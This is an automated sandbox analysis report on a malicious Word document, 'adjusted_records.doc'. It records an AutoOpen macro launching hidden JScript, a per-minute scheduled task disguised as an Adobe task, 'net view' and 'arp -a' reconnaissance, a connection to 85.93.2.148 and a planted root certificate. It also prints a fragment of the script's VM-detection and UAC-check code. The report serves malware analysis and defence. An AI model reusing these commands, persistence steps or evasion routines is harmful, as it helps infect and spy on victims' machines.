File created: C:\Users\user\Desktop\~$justed_records.doc

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRBDE7.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: adjusted_records.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: adjusted_records.doc	OLE document summary: title field not present or empty
Source: adjusted_records.doc	OLE document summary: author field not present or empty
Source: adjusted_records.doc	OLE document summary: edited time not present or 0

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.~u..0......... ...................................`.....*.t.,.h.,...................................3.....G..v
Source: C:\Windows\System32\cmd.exe	Console Write: ........ ............ ..,.......E.lJ........ .......@FoJ. ..,........T,.V.lJ....".......,.........}u........`.....,.....

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - select * from win32_process

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

SQL strings found in memory and binary data

Show sources

Source: wscript.exe

Binary or memory string: Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True85.93.2.148;

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknown	Process created: C:\Windows\System32\net.exe net view
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: unknown	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: unknown	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Writes ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File written: C:\Users\user~1\AppData\Local\Temp\crashpad.ini

Document contains embedded VBA macros

Show sources

Source: adjusted_records.doc

OLE indicator, VBA macros: true

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: adjusted_records.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen			Name: AutoOpen

Document contains an embedded VBA macro which may execute processes

Show sources

Source: adjusted_records.doc	OLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: adjusted_records.doc	OLE, VBA macro line: Shell ivwubka, False
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function armando, API Shell("cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini",False)	Name: armando

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: adjusted_records.doc	OLE, VBA macro line: Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: adjusted_records.doc	OLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function armando, String createobject: Set avfasci = CreateObject("Scripting.FileSystemObject")	Name: armando

Document contains an embedded macro with GUI obfuscation

Show sources

Source: adjusted_records.doc	Stream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: adjusted_records.doc	Stream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream

Suspicious javascript / visual basic script found (invalid extension)

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log

Wscript called in batch mode (surpress errors)

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: taskeng.exe	Binary or memory string: Progman
Source: taskeng.exe	Binary or memory string: Program Manager
Source: taskeng.exe	Binary or memory string: Shell_TrayWnd

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: wscript.exe	Binary or memory string: %exOf("vmware"),216,16
Source: wscript.exe	Binary or memory string: dexOf("vmware",32,217E
Source: wscript.exe	Binary or memory string: ';function inArray(what, where) {for(var i=0; i<where.length; i++) {if(what == where[i]) {return true;}}return false;}function is_uac () {var oShell = WScript.CreateObject("WScript.Shell");if(oShell.RegRead("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA") == 0) {return false;} else {return true;}}function protect () {var is_debugged = 0;var wmi = GetObject("winmgmts:root/CIMV2");var Query = wmi.ExecQuery("SELECT * FROM Win32_BIOS");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();t = item["SMBIOSBIOSVersion"]["toLowerCase"]();if(t.indexOf("virtualbox") >= 0 \|\| t.indexOf("vmware") >= 0) {is_debugged = 1;}t = item["SerialNumber"]["toLowerCase"]();if(t.indexOf("vmware") >= 0 \|\| t.indexOf("parallels") >= 0) {is_debugged = 1;}}var Query = wmi.ExecQuery("SELECT * FROM Win32_PnPEntity");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();var t = item["DeviceID"]["toLowerCase"]();var l = i

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Thread delayed: delay time: 200

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3576	Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3576	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3632	Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3656	Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696	Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3920	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076	Thread sleep time: -180000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076	Thread sleep time: -60000s >= -60s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe

Network Connect: 85.93.2.148 187

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
14:00:54	API Interceptor	1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
14:01:04	API Interceptor	24x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:06	Task Scheduler	Run new task: Adobe Acrobat Player Task path: wscript.exe s>//b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
14:02:00	API Interceptor	2x Sleep call for process: taskeng.exe modified from: 60000ms to: 500ms
14:02:14	API Interceptor	2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

Startup

System is w7_1

WINWORD.EXE (PID: 3440 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)

